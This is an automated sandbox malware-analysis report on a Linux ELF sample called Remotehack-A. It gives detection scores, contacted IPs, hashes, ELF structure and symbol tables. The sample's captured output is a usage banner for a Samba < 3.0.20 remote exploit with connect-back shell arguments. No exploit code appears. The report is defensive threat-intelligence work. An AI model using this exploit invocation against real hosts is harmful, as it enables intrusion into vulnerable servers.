Linux
Analysis Report
SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Multi AV Scanner detection for submitted file
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Executes the "rm" command used to delete files or directories
Classification
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1448261 |
Start date and time: | 2024-05-28 06:38:52 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 10m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
Detection: | MAL |
Classification: | mal48.linELF@0/0@0/0 |
Cookbook Comments: |
|
- Max analysis timeout: 600s exceeded, the analysis took too long
Command: | /tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
PID: | 6250 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | Samba < 3.0.20 Zuc by Zuc (zuc@hack.it) Usage: <victim-host> <connectback-ip> <connectback port> <version> Sample: LSA www.victim.com 80.81.82.83 31337 1 |
Standard Error: |
⊘No yara matches
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Classification label: |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Symbol name: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 File Deletion | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
⊘No configs have been found
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Linux.Exploit.Remotehack | ||
9% | Virustotal | Browse |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No contacted domains info
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
54.171.230.55 | unknown | United States | 16509 | AMAZON-02US | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54.171.230.55 | Get hash | malicious | Okiru | Browse | ||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Muhstik, Tsunami | Browse | |||
Get hash | malicious | Muhstik, Tsunami | Browse | |||
Get hash | malicious | Gafgyt, Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Moobot | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
109.202.202.202 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Kaiji | Browse | |||
91.189.91.43 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Kaiji | Browse | |||
Get hash | malicious | Unknown | Browse | |||
91.189.91.42 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Kaiji | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
AMAZON-02US | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
INIT7CH | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Kaiji | Browse |
|
⊘No context
⊘No context
⊘No created / dropped files found
File type: | |
Entropy (8bit): | 4.9056401313215865 |
TrID: |
|
File name: | SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
File size: | 31'124 bytes |
MD5: | 9c4a6db5821b4a390b09223e5047cce7 |
SHA1: | 0395f1b0a67701763fc5ed8fce748c341a71bcd3 |
SHA256: | 79f4ad8a9216ca08bef87e8d0d63d2fba931375ea9ac941c205ae577ec8ab5b3 |
SHA512: | efe46fcaa0bad618b55d29f2dcb208cd77f0dc6ebe4062338c03b4489e8c44441dfa72b52d1341bac4c1d610eabce368397cce2059a2570464c0c3af918614c2 |
SSDEEP: | 384:UVBycpjD3JC2+FGa8dAw4ZXZrUhCEejrr02cVAV73/v/ruJ9M2cN8S9h:UmchJCLd8dAnZrUhCtrrtHf8S9h |
TLSH: | 04E2C4A77241E72AE0A3CB350E534AB5E371B1749723B317AF0946366D126C81F34B8B |
File Content Preview: | .ELF..............>.....0.@.....@........^..........@.8...@.&.#.........@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....DB......DB........ ..............N.......N`.... |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 64 |
Program Header Offset: | 64 |
Program Header Size: | 56 |
Number of Program Headers: | 9 |
Section Header Offset: | 24232 |
Section Header Size: | 64 |
Number of Section Headers: | 38 |
Header String Table Index: | 35 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.interp | PROGBITS | 0x400238 | 0x238 | 0x1c | 0x0 | 0x2 | A | 0 | 0 | 1 |
.note.ABI-tag | NOTE | 0x400254 | 0x254 | 0x20 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.note.gnu.build-id | NOTE | 0x400274 | 0x274 | 0x24 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.hash | HASH | 0x400298 | 0x298 | 0xa4 | 0x4 | 0x2 | A | 6 | 0 | 8 |
.gnu.hash | GNU_HASH | 0x400340 | 0x340 | 0x1c | 0x0 | 0x2 | A | 6 | 0 | 8 |
.dynsym | DYNSYM | 0x400360 | 0x360 | 0x210 | 0x18 | 0x2 | A | 7 | 1 | 8 |
.dynstr | STRTAB | 0x400570 | 0x570 | 0xc7 | 0x0 | 0x2 | A | 0 | 0 | 1 |
.gnu.version | VERSYM | 0x400638 | 0x638 | 0x2c | 0x2 | 0x2 | A | 6 | 0 | 2 |
.gnu.version_r | VERNEED | 0x400668 | 0x668 | 0x30 | 0x0 | 0x2 | A | 7 | 1 | 8 |
.rela.dyn | RELA | 0x400698 | 0x698 | 0x18 | 0x18 | 0x2 | A | 6 | 0 | 8 |
.rela.plt | RELA | 0x4006b0 | 0x6b0 | 0x1f8 | 0x18 | 0x2 | A | 6 | 13 | 8 |
.init | PROGBITS | 0x4008a8 | 0x8a8 | 0x1a | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.plt | PROGBITS | 0x4008d0 | 0x8d0 | 0x160 | 0x10 | 0x6 | AX | 0 | 0 | 16 |
.text | PROGBITS | 0x400a30 | 0xa30 | 0x2a74 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x4034a4 | 0x34a4 | 0x9 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x4034b0 | 0x34b0 | 0x8bb | 0x0 | 0x2 | A | 0 | 0 | 8 |
.eh_frame_hdr | PROGBITS | 0x403d6c | 0x3d6c | 0xec | 0x0 | 0x2 | A | 0 | 0 | 4 |
.eh_frame | PROGBITS | 0x403e58 | 0x3e58 | 0x3ec | 0x0 | 0x2 | A | 0 | 0 | 8 |
.init_array | INIT_ARRAY | 0x604e00 | 0x4e00 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.fini_array | FINI_ARRAY | 0x604e08 | 0x4e08 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.jcr | PROGBITS | 0x604e10 | 0x4e10 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.dynamic | DYNAMIC | 0x604e18 | 0x4e18 | 0x1e0 | 0x10 | 0x3 | WA | 7 | 0 | 8 |
.got | PROGBITS | 0x604ff8 | 0x4ff8 | 0x8 | 0x8 | 0x3 | WA | 0 | 0 | 8 |
.got.plt | PROGBITS | 0x605000 | 0x5000 | 0xc0 | 0x8 | 0x3 | WA | 0 | 0 | 8 |
.data | PROGBITS | 0x6050c0 | 0x50c0 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.bss | NOBITS | 0x6050d0 | 0x50d0 | 0x18 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.comment | PROGBITS | 0x0 | 0x50d0 | 0x42 | 0x1 | 0x30 | MS | 0 | 0 | 1 |
.debug_aranges | PROGBITS | 0x0 | 0x5120 | 0x100 | 0x0 | 0x0 | 0 | 0 | 16 | |
.debug_info | PROGBITS | 0x0 | 0x5220 | 0x31b | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_abbrev | PROGBITS | 0x0 | 0x553b | 0x183 | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_line | PROGBITS | 0x0 | 0x56be | 0x1e7 | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_str | PROGBITS | 0x0 | 0x58a5 | 0x2ad | 0x1 | 0x30 | MS | 0 | 0 | 1 |
.debug_loc | PROGBITS | 0x0 | 0x5b52 | 0x11b | 0x0 | 0x0 | 0 | 0 | 1 | |
.debug_ranges | PROGBITS | 0x0 | 0x5c70 | 0xd0 | 0x0 | 0x0 | 0 | 0 | 16 | |
.shstrtab | STRTAB | 0x0 | 0x5d40 | 0x161 | 0x0 | 0x0 | 0 | 0 | 1 | |
.symtab | SYMTAB | 0x0 | 0x6828 | 0xb58 | 0x18 | 0x0 | 37 | 58 | 8 | |
.strtab | STRTAB | 0x0 | 0x7380 | 0x614 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
PHDR | 0x40 | 0x400040 | 0x400040 | 0x1f8 | 0x1f8 | 1.7277 | 0x5 | R E | 0x8 | ||
INTERP | 0x238 | 0x400238 | 0x400238 | 0x1c | 0x1c | 3.9408 | 0x4 | R | 0x1 | /lib64/ld-linux-x86-64.so.2 | .interp |
LOAD | 0x0 | 0x400000 | 0x400000 | 0x4244 | 0x4244 | 5.6972 | 0x5 | R E | 0x200000 | .interp .note.ABI-tag .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame | |
LOAD | 0x4e00 | 0x604e00 | 0x604e00 | 0x2d0 | 0x2e8 | 1.7959 | 0x6 | RW | 0x200000 | .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss | |
DYNAMIC | 0x4e18 | 0x604e18 | 0x604e18 | 0x1e0 | 0x1e0 | 1.5152 | 0x6 | RW | 0x8 | .dynamic | |
NOTE | 0x254 | 0x400254 | 0x400254 | 0x44 | 0x44 | 3.5218 | 0x4 | R | 0x4 | .note.ABI-tag .note.gnu.build-id | |
GNU_EH_FRAME | 0x3d6c | 0x403d6c | 0x403d6c | 0xec | 0xec | 4.2646 | 0x4 | R | 0x4 | .eh_frame_hdr | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 | ||
GNU_RELRO | 0x4e00 | 0x604e00 | 0x604e00 | 0x200 | 0x200 | 1.5236 | 0x4 | R | 0x1 | .init_array .fini_array .jcr .dynamic .got |
Type | Meta | Value | Tag |
---|---|---|---|
DT_NEEDED | sharedlib | libc.so.6 | 0x1 |
DT_INIT | value | 0x4008a8 | 0xc |
DT_FINI | value | 0x4034a4 | 0xd |
DT_INIT_ARRAY | value | 0x604e00 | 0x19 |
DT_INIT_ARRAYSZ | bytes | 8 | 0x1b |
DT_FINI_ARRAY | value | 0x604e08 | 0x1a |
DT_FINI_ARRAYSZ | bytes | 8 | 0x1c |
DT_HASH | value | 0x400298 | 0x4 |
DT_GNU_HASH | value | 0x400340 | 0x6ffffef5 |
DT_STRTAB | value | 0x400570 | 0x5 |
DT_SYMTAB | value | 0x400360 | 0x6 |
DT_STRSZ | bytes | 199 | 0xa |
DT_SYMENT | bytes | 24 | 0xb |
DT_DEBUG | value | 0x0 | 0x15 |
DT_PLTGOT | value | 0x605000 | 0x3 |
DT_PLTRELSZ | bytes | 504 | 0x2 |
DT_PLTREL | pltrel | DT_RELA | 0x14 |
DT_JMPREL | value | 0x4006b0 | 0x17 |
DT_RELA | value | 0x400698 | 0x7 |
DT_RELASZ | bytes | 24 | 0x8 |
DT_RELAENT | bytes | 24 | 0x9 |
DT_VERNEED | value | 0x400668 | 0x6ffffffe |
DT_VERNEEDNUM | value | 1 | 0x6fffffff |
DT_VERSYM | value | 0x400638 | 0x6ffffff0 |
DT_NULL | value | 0x0 | 0x0 |
Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx |
---|---|---|---|---|---|---|---|---|---|
.dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | |||
__gmon_start__ | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
__libc_start_main | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
atoi | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
close | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
connect | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
exit | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
free | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
gethostbyname | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
htons | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
inet_addr | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
memcpy | GLIBC_2.14 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
memset | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
puts | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
recv | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
send | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
shutdown | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
socket | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
strcpy | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
strdup | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
strlen | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
usleep | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
.symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | |||
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400238 | 0 | SECTION | <unknown> | DEFAULT | 1 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400254 | 0 | SECTION | <unknown> | DEFAULT | 2 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400274 | 0 | SECTION | <unknown> | DEFAULT | 3 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400298 | 0 | SECTION | <unknown> | DEFAULT | 4 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400340 | 0 | SECTION | <unknown> | DEFAULT | 5 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400360 | 0 | SECTION | <unknown> | DEFAULT | 6 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400570 | 0 | SECTION | <unknown> | DEFAULT | 7 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400638 | 0 | SECTION | <unknown> | DEFAULT | 8 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400668 | 0 | SECTION | <unknown> | DEFAULT | 9 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400698 | 0 | SECTION | <unknown> | DEFAULT | 10 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4006b0 | 0 | SECTION | <unknown> | DEFAULT | 11 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4008a8 | 0 | SECTION | <unknown> | DEFAULT | 12 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4008d0 | 0 | SECTION | <unknown> | DEFAULT | 13 | |
.symtab | 0x400a30 | 0 | SECTION | <unknown> | DEFAULT | 14 | |||
GLIBC_2.14 | libc.so.6 | .symtab | 0x4034a4 | 0 | SECTION | <unknown> | DEFAULT | 15 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4034b0 | 0 | SECTION | <unknown> | DEFAULT | 16 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x403d6c | 0 | SECTION | <unknown> | DEFAULT | 17 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x403e58 | 0 | SECTION | <unknown> | DEFAULT | 18 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x604e00 | 0 | SECTION | <unknown> | DEFAULT | 19 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x604e08 | 0 | SECTION | <unknown> | DEFAULT | 20 | |
GLIBC_2.2.5 | libc.so.6 | .symtab | 0x604e10 | 0 | SECTION | <unknown> | DEFAULT | 21 | |
.symtab | 0x604e18 | 0 | SECTION | <unknown> | DEFAULT | 22 | |||
.symtab | 0x604ff8 | 0 | SECTION | <unknown> | DEFAULT | 23 | |||
.symtab | 0x605000 | 0 | SECTION | <unknown> | DEFAULT | 24 | |||
.symtab | 0x6050c0 | 0 | SECTION | <unknown> | DEFAULT | 25 | |||
.symtab | 0x6050d0 | 0 | SECTION | <unknown> | DEFAULT | 26 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 27 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 28 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 29 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 30 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 31 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 32 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 33 | |||
.symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 34 | |||
.symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | |||
.symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | |||
BINDRequest2nd | .symtab | 0x40163f | 1154 | FUNC | <unknown> | DEFAULT | 14 | ||
BINDRequestRESPONSE2nd | .symtab | 0x401ac1 | 101 | FUNC | <unknown> | DEFAULT | 14 | ||
LSA | .symtab | 0x40267c | 3493 | FUNC | <unknown> | DEFAULT | 14 | ||
NTCreateAndXRequest2nd | .symtab | 0x401398 | 571 | FUNC | <unknown> | DEFAULT | 14 | ||
NTCreateAndXRequestRESPONSE2nd | .symtab | 0x4015d3 | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
NegotiateProtocolRequest2nd | .symtab | 0x400be4 | 297 | FUNC | <unknown> | DEFAULT | 14 | ||
NegotiateProtocolRequestRESPONSE2nd | .symtab | 0x400d0d | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
SessionSetupAndXRequest2nd | .symtab | 0x400d6b | 214 | FUNC | <unknown> | DEFAULT | 14 | ||
SessionSetupAndXRequest2ndb | .symtab | 0x400ead | 266 | FUNC | <unknown> | DEFAULT | 14 | ||
SessionSetupAndXRequest2ndc | .symtab | 0x401023 | 348 | FUNC | <unknown> | DEFAULT | 14 | ||
SessionSetupAndXRequestRESPONSE2nd | .symtab | 0x400e41 | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
SessionSetupAndXRequestRESPONSE2ndb | .symtab | 0x400fb7 | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
SessionSetupAndXRequestRESPONSE2ndc | .symtab | 0x40117f | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
TreeConnectAndXRequest2nd | .symtab | 0x4011eb | 293 | FUNC | <unknown> | DEFAULT | 14 | ||
TreeConnectAndXRequestRESPONSE2nd | .symtab | 0x401310 | 136 | FUNC | <unknown> | DEFAULT | 14 | ||
UniversalMethodFirst | .symtab | 0x401b26 | 647 | FUNC | <unknown> | DEFAULT | 14 | ||
UniversalMethodFirstRESPONSE | .symtab | 0x401dad | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
UniversalMethodLast | .symtab | 0x4020f0 | 707 | FUNC | <unknown> | DEFAULT | 14 | ||
UniversalMethodLastRESPONSE | .symtab | 0x4023b3 | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
UniversalMethodMiddle | .symtab | 0x401e0b | 647 | FUNC | <unknown> | DEFAULT | 14 | ||
UniversalMethodMiddleRESPONSE | .symtab | 0x402092 | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
_DYNAMIC | .symtab | 0x604e18 | 0 | OBJECT | <unknown> | DEFAULT | 22 | ||
_GLOBAL_OFFSET_TABLE_ | .symtab | 0x605000 | 0 | OBJECT | <unknown> | DEFAULT | 24 | ||
_IO_stdin_used | .symtab | 0x4034b0 | 4 | OBJECT | <unknown> | DEFAULT | 16 | ||
_ITM_deregisterTMCloneTable | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
_ITM_registerTMCloneTable | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
_Jv_RegisterClasses | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
__FRAME_END__ | .symtab | 0x404240 | 0 | OBJECT | <unknown> | DEFAULT | 18 | ||
__JCR_END__ | .symtab | 0x604e10 | 0 | OBJECT | <unknown> | DEFAULT | 21 | ||
__JCR_LIST__ | .symtab | 0x604e10 | 0 | OBJECT | <unknown> | DEFAULT | 21 | ||
__TMC_END__ | .symtab | 0x6050d0 | 0 | OBJECT | <unknown> | HIDDEN | 25 | ||
__bss_start | .symtab | 0x6050d0 | 0 | NOTYPE | <unknown> | DEFAULT | 26 | ||
__data_start | .symtab | 0x6050c0 | 0 | NOTYPE | <unknown> | DEFAULT | 25 | ||
__do_global_dtors_aux | .symtab | 0x400ad0 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
__do_global_dtors_aux_fini_array_entry | .symtab | 0x604e08 | 0 | OBJECT | <unknown> | DEFAULT | 20 | ||
__dso_handle | .symtab | 0x6050c8 | 0 | OBJECT | <unknown> | HIDDEN | 25 | ||
__frame_dummy_init_array_entry | .symtab | 0x604e00 | 0 | OBJECT | <unknown> | DEFAULT | 19 | ||
__gmon_start__ | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
__init_array_end | .symtab | 0x604e08 | 0 | NOTYPE | <unknown> | DEFAULT | 19 | ||
__init_array_start | .symtab | 0x604e00 | 0 | NOTYPE | <unknown> | DEFAULT | 19 | ||
__libc_csu_fini | .symtab | 0x4034a0 | 2 | FUNC | <unknown> | DEFAULT | 14 | ||
__libc_csu_init | .symtab | 0x403430 | 101 | FUNC | <unknown> | DEFAULT | 14 | ||
__libc_start_main@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
_edata | .symtab | 0x6050d0 | 0 | NOTYPE | <unknown> | DEFAULT | 25 | ||
_end | .symtab | 0x6050e8 | 0 | NOTYPE | <unknown> | DEFAULT | 26 | ||
_fini | .symtab | 0x4034a4 | 0 | FUNC | <unknown> | DEFAULT | 15 | ||
_init | .symtab | 0x4008a8 | 0 | FUNC | <unknown> | DEFAULT | 12 | ||
_start | .symtab | 0x400a30 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
